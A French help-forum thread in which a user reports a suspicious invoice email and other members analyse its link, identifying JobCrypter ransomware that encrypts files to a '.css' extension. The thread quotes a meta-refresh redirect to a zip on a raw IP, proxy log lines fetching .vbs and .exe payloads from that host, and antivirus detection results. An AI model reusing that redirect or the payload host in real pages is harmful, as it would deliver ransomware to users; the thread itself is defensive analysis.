e-mail douteux : Locker .css

Malpertuis · par **Malpertuis** » 06 févr. 2017 11:01

Bonjour,

J'ai reçu ceci :

Capture.JPG

qui me semble bien suspect et me suis bien gardé de cliquer sur les liens.
Comment fait-on pour vérifier que ce mail (via Thunderbird) contient des éléments malicieux. Avec le clic droit je ne vois pas la possibilité d'analyser avec Avast.

par **Malekal_morte** » 06 févr. 2017 11:15

Salut,

oui il est bidon,
tu peux donner le lien pour voir ?

Tu fais un clic droit dessus, copier le lien et tu le donnes ici.

Malpertuis · par **Malpertuis** » 06 févr. 2017 11:37

Merci pour cette réponse, ce lien ci ayant trait à la sois-disant facture ? :

87.106.145.33/1/

edit :
par sécuriré J'ai simplement recopié le texte pour éviter la propagation intempestive...

par **angelique** » 06 févr. 2017 11:45

ouai ça charge un .js pourri

Code : Tout sélectionner

<meta http-equiv="refresh" content="0;url=hxxp://87.106.145.33/555500.zip">

https://www.virustotal.com/en/file/e8b4 ... 486376699/

https://www.hybrid-analysis.com/sample/ ... mentId=100

par **Malekal_morte** » 06 févr. 2017 12:06

Merci c'est interressant.

C'est ce crétin : JobCrypter - locked extension .css

Code : Tout sélectionner

1455036575.974     79 192.168.1.101 TCP_MISS/200 398 GET http://87.106.145.33/1/ - DIRECT/87.106.145.33 text/html
1455036576.040     39 192.168.1.101 TCP_MISS/200 1440 GET http://87.106.145.33/555500.zip - DIRECT/87.106.145.33 application/x-zip-compressed
1455036598.756     39 192.168.1.101 TCP_MISS/200 4897 GET http://87.106.145.33/1.vbs - DIRECT/87.106.145.33 text/vbscript
1455036598.756     39 192.168.1.101 TCP_MISS/200 4897 GET http://87.106.145.33/1.vbs - DIRECT/87.106.145.33 text/vbscript
1455036678.177   1112 192.168.1.101 TCP_MISS/200 505681 GET http://87.106.145.33/22.exe - DIRECT/87.106.145.33 application/octet-stream

Il y a un vbs, donc les utilisateurs de Marmiton sont protégés.

jobcrypter_back.png

Locker.exe puis les fichiers sont chiffrés avec l'extension .css

jobcrypter_back_2.png

jobcrypter_back_3.png

Après gros plantages :

SHA256: 383cdd0d52de2b9a0944ae39daaf8d9b5dbb4e70c42670b6a41de853b030f49b
Nom du fichier : fff.exe
Ratio de détection : 8 / 56
Date d'analyse : 2017-02-06 10:44:24 UTC (il y a 1 minute)

Antivirus Résultat Mise à jour
AegisLab DangerousObject.Multi.Gen.mzhg 20170206
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9959 20170125
CrowdStrike Falcon (ML) malicious_confidence_94% (D) 20170130
Cyren W32/Symmi.O2.gen!Eldorado 20170206
F-Prot W32/Symmi.O2.gen!Eldorado 20170206
Ikarus Trojan.MSIL.Agent 20170206
Invincea trojan.win32.skeeyah.a!rfn 20170203
Qihoo-360 HEUR/QVM10.1.0000.Malware.Gen 20170206

Malpertuis · par **Malpertuis** » 06 févr. 2017 12:44

Bien, de mon côté rien de spécial à faire comme action à part mettre ce mail à la poubelle? Avast! Et Malwarebytes Anti-Malware (MBAM ) restent calmes.

par **Malekal_morte** » 06 févr. 2017 14:04

Tu n'as pas ouvert le lien, ni télécharger le zip j'imagine
donc ils ne vont rien détecter.

Malekal.com forum

e-mail douteux : Locker .css

e-mail douteux : Locker .css

Re: e-mail douteux

Re: e-mail douteux

Re: e-mail douteux

Re: e-mail douteux : Locker .css

Re: e-mail douteux : Locker .css

Re: e-mail douteux : Locker .css